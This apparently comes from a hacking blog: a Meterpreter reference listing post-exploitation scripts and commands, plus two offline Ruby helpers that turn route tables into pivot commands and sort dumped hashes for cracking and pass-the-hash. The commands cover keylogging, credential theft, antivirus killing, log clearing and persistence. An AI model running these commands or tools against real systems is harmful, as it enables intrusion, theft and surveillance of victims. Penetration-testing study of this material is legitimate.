Meterpreter is an incredible hacking and pentesting tool. In recent years, numerous hackers and security pros have developed scripts. This list attempts to provide you with a complete list of scripts as of this writing.
Metasploit framework is an incredible hacking and pentesting tool that every hacker worth their salt should be conversant with. In a previous post, I provided you a cheat sheet of meterpreter commands. These commands are essential to running Metasploit's meterpreter, but in recent years numerous hackers and security pros have developed scripts that we can run from the meterpreter and that can be much more effective and malicious. In this post, I will try to provide you the most complete list and description available anywhere on the web. You will want to bookmark this page too, as no one remembers all these scripts and it's likely you will want to return here at a later time to find a particular script for a particular hack. Please note that new meterpreter scripts are being developed every day. This list attempts to provide you with a complete list of scripts as of this writing. If you find errors or typos, please feel free to post them here, and I will try to correct them as soon as humanly possible.

Each script is run from the meterpreter prompt with run followed by the script name without the .rb extension (for example run checkvm); most accept -h to list their options. Meterpreter scripts have since been deprecated in favor of post modules (run post/windows/gather/..., for instance), and several of the scripts below have been removed from or replaced in current Metasploit releases, so check what your installation actually ships before relying on a name from this list.

Script Commands with Brief Descriptions

arp_scanner.rb - Script for performing an ARP scan discovery of the local network.
autoroute.rb - Script for adding routes through a Meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if the target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting the domain admin account list for later use.
dumplinks.rb - Parses .lnk files from a user's Recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations including share names, volume serial numbers and more. This info may help you target additional systems.
duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, to hand a meterpreter session to another controller, or to start a keylogger in another process.
enum_chrome.rb - Script to extract data from a Chrome installation.
enum_firefox.rb - Script for extracting data from Firefox.
enum_logged_on_users.rb - Script for enumerating currently logged-on users and users that have logged in to the system.
enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
enum_putty.rb - Enumerates PuTTY saved connections.
enum_shares.rb - Script for enumerating shares offered and the history of mounted shares.
enum_vmware.rb - Enumerates VMware configurations for VMware products.
event_manager.rb - Shows information about Event Logs on the target system and their configuration.
file_collector.rb - Script for searching for and downloading files that match a specific pattern.
get_application_list.rb - Script for extracting a list of installed applications and their versions.
getcountermeasure.rb - Script for detecting AV, HIPS, third-party firewalls, DEP configuration and Windows Firewall configuration. Also provides the option to kill the processes of detected products and disable the built-in firewall.
get_env.rb - Script for extracting a list of all System and User environment variables.
getfilezillacreds.rb - Script for extracting servers and credentials from FileZilla.
getgui.rb - Script to enable Windows RDP.
get_local_subnets.rb - Gets a list of local subnets based on the host's routes.
get_pidgin_creds.rb - Script for extracting configured Pidgin services with usernames and passwords.
gettelnet.rb - Checks to see whether telnet is installed.
get_valid_community.rb - Gets a valid community string from SNMP.
getvncpw.rb - Gets the VNC password.
hashdump.rb - Grabs password hashes from the SAM.
hostedit.rb - Script for adding entries to the Windows hosts file.
keylogrecorder.rb - Script for running a keylogger and saving all the keystrokes.
killav.rb - Attempts to terminate the processes of nearly every antivirus product on the victim.
metsvc.rb - Deletes one meterpreter service and starts another.
migrate - Moves the meterpreter server into another process.
multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vista, Windows XP and Windows 2008 targets.
multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
multi_meter_inject.rb - Script for injecting a reverse TCP Meterpreter payload into the memory of multiple PIDs; if none is provided, a notepad process will be created and a Meterpreter payload will be injected into it.
multiscript.rb - Script for running multiple scripts on a Meterpreter session.
netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
packetrecorder.rb - Script for capturing packets into a PCAP file.
panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
persistence.rb - Script for creating a persistent backdoor on a target host.
pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
powerdump.rb - Meterpreter script for using pure PowerShell to extract usernames and password hashes through registry keys. This script requires you to be running as SYSTEM in order to work properly. It has currently been tested on Server 2008 and Windows 7, which install PowerShell by default.
prefetchtool.rb - Script for extracting information from the Windows Prefetch folder.
process_memdump.rb - Script based on the paper "Neurosurgery With Meterpreter".
remotewinenum.rb - This script will enumerate Windows hosts in the target environment, given a username and password or using the credentials under which Meterpreter is running, with the native WMIC tool.
scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
schelevator.rb - Exploit for the Windows Vista/7/2008 Task Scheduler 2.0 privilege escalation. This script exploits the Task Scheduler 2.0 XML 0day used by Stuxnet.
schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of commands against one or more targets, using the schtasks command to run them as SYSTEM. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
screen_unlock.rb - Script to unlock a Windows screen. Needs SYSTEM privileges to run and known signatures for the target system.
search_dwld.rb - Script that recursively searches for and downloads files matching a given pattern.
service_manager.rb - Script for managing Windows services.
service_permissions_escalate.rb - This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
sound_recorder.rb - Script for recording, in intervals, the sound captured by the target host's microphone.
srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
uploadexec.rb - Script to upload an executable file to the host and run it.
virtualbox_sysenter_dos - Script to DoS VirtualBox.
virusscan_bypass.rb - Script that kills McAfee VirusScan Enterprise v8.7.0i+ processes.
vnc.rb - Meterpreter script for obtaining a quick VNC session.
webcam.rb - Script to enable and capture images from the host webcam.
win32-sshclient.rb - Script to deploy and run the "plink" command-line SSH client. Supports only MS Windows 2k/XP/Vista hosts.
win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
winbf.rb - Function for checking the password policy of the current system. This policy may resemble the policy of other servers in the target environment.
winenum.rb - Enumerates the Windows system, including environment variables, network interfaces, routing, user accounts, etc.
wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista, Windows XP and Windows 2008 targets.

Step 1: Core Commands

At its most basic, meterpreter looks like a Unix-style shell on the victim's computer: the command names are the familiar Linux ones. They are not passed to a shell on the target, though; the meterpreter server implements them itself, which is why they work the same whether the target is Windows or another operating system. Here are some of the core commands we can use on the meterpreter.

? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the meterpreter server into the process with the designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension (called load in current versions)
write - writes data to a channel

Step 2: File System Commands

cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file: it is downloaded, opened in vi/vim on the attacker side, and uploaded again on save
getlwd - print the local (attacker-side) directory
getwd - print the working directory on the victim
lcd - change local directory
lpwd - print local directory
ls - list files in the current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove a directory on the victim system
upload - upload a file from the attacker system to the victim

Step 3: Networking Commands

ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - creates a port forward through the session: a port on the attacker's machine is relayed to a host and port reachable from the victim (use it for services on the victim's internal networks)
route - view or modify the victim's routing table (the pivot routes that send msfconsole traffic through the session are managed with route at the msf prompt or with the autoroute script)

Step 4: System Commands

clearev - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - attempts to enable all privileges available to the current token
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine, dropping any impersonated token
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - impersonates the token of the process with the specified PID
sysinfo - gets the details about the victim computer such as OS and name

Step 5: User Interface Commands

enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - reports how long the user at the console has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger; it captures the input of the process meterpreter lives in, so migrate first into the one you want (explorer.exe for the user's desktop, winlogon.exe for logon credentials)
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components (keyboard and mouse)

Step 6: Privilege Escalation Commands

getsystem - tries its built-in techniques (named pipe impersonation and token duplication; -t selects one) to elevate to SYSTEM

Step 7: Password Dump Commands

hashdump - dumps the LM and NT password hashes from the SAM (requires SYSTEM). Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump" (the latter is also available as the post module post/windows/gather/smart_hashdump). Look for more on those on my upcoming meterpreter script cheat sheet.

Step 8: Timestomp Commands

timestomp - manipulates the modified, accessed, created and MFT-entry-modified (MACE) timestamps of a file
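As an added example (not code from the original post or from Metasploit), here is the job that get_local_subnets.rb does and that Step 3's route command hands you the raw material for: turning the victim's route table into subnets you can feed to run autoroute. The route print output below is constructed, and the function names are my own; everything runs offline and nothing is attached to a session.

```ruby
# Added example: derive directly connected subnets from a Windows route table,
# the way get_local_subnets.rb does, so they can be fed to "run autoroute -s".
# Not Metasploit code; the route table below is constructed for this example.
require 'ipaddr'

# Constructed "route print" output from a Vista+ host with two interfaces.
SAMPLE_ROUTE_PRINT = <<~ROUTES
  IPv4 Route Table
  ===========================================================================
  Active Routes:
  Network Destination        Netmask          Gateway       Interface  Metric
            0.0.0.0          0.0.0.0        10.10.1.1      10.10.1.57     25
          10.10.1.0    255.255.255.0          On-link      10.10.1.57    281
         10.10.1.57  255.255.255.255          On-link      10.10.1.57    281
        10.10.1.255  255.255.255.255          On-link      10.10.1.57    281
          127.0.0.0        255.0.0.0          On-link       127.0.0.1    331
          127.0.0.1  255.255.255.255          On-link       127.0.0.1    331
    127.255.255.255  255.255.255.255          On-link       127.0.0.1    331
       192.168.56.0    255.255.255.0          On-link   192.168.56.20    281
      192.168.56.20  255.255.255.255          On-link   192.168.56.20    281
     192.168.56.255  255.255.255.255          On-link   192.168.56.20    281
          224.0.0.0        240.0.0.0          On-link       127.0.0.1    331
          224.0.0.0        240.0.0.0          On-link      10.10.1.57    281
    255.255.255.255  255.255.255.255          On-link       127.0.0.1    331
    255.255.255.255  255.255.255.255          On-link      10.10.1.57    281
  ===========================================================================
ROUTES

Route = Struct.new(:dest, :mask, :gateway, :iface, :metric)

IPV4 = /\d{1,3}(?:\.\d{1,3}){3}/
ROUTE_ROW = /\A(#{IPV4})\s+(#{IPV4})\s+(\S+)\s+(#{IPV4})\s+(\d+)\z/

# Keep only the data rows; header and separator lines do not match.
def parse_route_print(text)
  text.each_line.filter_map do |line|
    m = ROUTE_ROW.match(line.strip) or next
    Route.new(m[1], m[2], m[3], m[4], m[5].to_i)
  end
end

# 255.255.255.0 -> 24: count the set bits of the mask.
def prefix_length(mask)
  IPAddr.new(mask).to_i.to_s(2).count('1')
end

# A route is directly connected when its gateway is the interface itself
# (XP prints the interface IP; Vista and later print "On-link"). Then drop
# what is not a pivotable subnet: the default route, /32 host routes,
# loopback, multicast and the limited broadcast address.
def local_subnets(routes)
  routes.select { |r| r.gateway == 'On-link' || r.gateway == r.iface }
        .reject { |r| r.mask == '0.0.0.0' || r.mask == '255.255.255.255' }
        .reject { |r| IPAddr.new('127.0.0.0/8').include?(r.dest) }
        .reject { |r| IPAddr.new('224.0.0.0/4').include?(r.dest) }
        .map { |r| "#{r.dest}/#{prefix_length(r.mask)}" }
        .uniq
end

# The meterpreter commands you would type next; returned as strings because
# nothing here is attached to a session.
def autoroute_commands(subnets)
  subnets.map { |s| "run autoroute -s #{s}" }
end

# True when a target falls inside one of the pivot subnets, i.e. it must be
# reached through the session rather than from the attacker box directly.
def reachable_via_pivot?(subnets, ip)
  subnets.any? { |s| IPAddr.new(s).include?(ip) }
end

if __FILE__ == $PROGRAM_NAME
  subnets = local_subnets(parse_route_print(SAMPLE_ROUTE_PRINT))
  puts autoroute_commands(subnets)
  puts reachable_via_pivot?(subnets, '192.168.56.101')
end
```

The filtering is the part worth copying: the /32 entries, the 224.0.0.0/4 multicast rows and 255.255.255.255 all show up as "On-link" and would produce useless (and noisy) pivot routes if passed to autoroute unfiltered.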
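A second added example, again not from the post or from Metasploit: once hashdump (or run hashdump / run smart_hashdump, or hashdump.rb from the script list) has printed its user:RID:LM:NT::: lines, this is the sorting you do before cracking or passing the hash. The sample dump and the function names are constructed for this example; the two sentinel constants are the well-known LM and NT hashes of the empty string, and the first NT hash in the sample is the familiar hash of "password".

```ruby
# Added example: triage hashdump output ("user:RID:LM:NT:::") into blank
# passwords, crackable LM hashes, NT hashes for offline cracking and a
# pass-the-hash credential for the built-in Administrator. Not Metasploit
# code; the dump below is constructed (the last NT hash is arbitrary).

# LM hash of the empty string: stored when LM hashing is disabled, which is
# the default since Vista/2008, so there is no LM hash to crack.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze
# NT hash of the empty string: the account really has a blank password.
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze

# Constructed sample; the status line mimics what the hashdump script prints.
SAMPLE_HASHDUMP = <<~DUMP
  [*] Obtaining the boot key...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
DUMP

Account = Struct.new(:user, :rid, :lm, :nt) do
  def lm_stored?
    lm != EMPTY_LM
  end

  def blank_password?
    nt == EMPTY_NT
  end

  # RID 500 is the built-in Administrator even when it has been renamed.
  def builtin_admin?
    rid == 500
  end

  # LM:NT pair, the SMBPass form psexec-style modules accept for pass-the-hash.
  def pth_pass
    "#{lm}:#{nt}"
  end
end

HASH_LINE = /\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i

# Status lines and anything else that is not a pwdump record are skipped.
def parse_hashdump(text)
  text.each_line.filter_map do |line|
    m = HASH_LINE.match(line.strip) or next
    Account.new(m[1], m[2].to_i, m[3].downcase, m[4].downcase)
  end
end

# Blank passwords are immediate logins, LM hashes fall to a rainbow table in
# minutes, everything else goes to the NT cracking queue, and RID 500 gets a
# ready-made pass-the-hash credential.
def triage(accounts)
  {
    blank:     accounts.select(&:blank_password?).map(&:user),
    lm_crack:  accounts.select(&:lm_stored?).map(&:user),
    nt_crack:  accounts.reject(&:blank_password?).map(&:user),
    pth_admin: accounts.select(&:builtin_admin?).map(&:pth_pass)
  }
end

# The same NT hash on several accounts means one crack (or one pass-the-hash)
# covers all of them.
def shared_nt_hashes(accounts)
  accounts.group_by(&:nt)
          .select { |_, same| same.size > 1 }
          .transform_values { |same| same.map(&:user) }
end

# "user:NT" lines for an offline cracker (john's NT format); blank passwords
# need no cracking and are left out.
def cracker_lines(accounts)
  accounts.reject(&:blank_password?).map { |a| "#{a.user}:#{a.nt}" }
end

if __FILE__ == $PROGRAM_NAME
  accounts = parse_hashdump(SAMPLE_HASHDUMP)
  p triage(accounts)
  p shared_nt_hashes(accounts)
  puts cracker_lines(accounts)
end
```

Two readings of the sentinels matter in practice: the empty LM hash does not mean the account has no password, only that the system is not storing LM hashes, while the empty NT hash does mean a blank password. The LM:NT string is what you paste as SMBPass to a psexec-style module; the NT half alone is what hashcat's NTLM mode (-m 1000) wants.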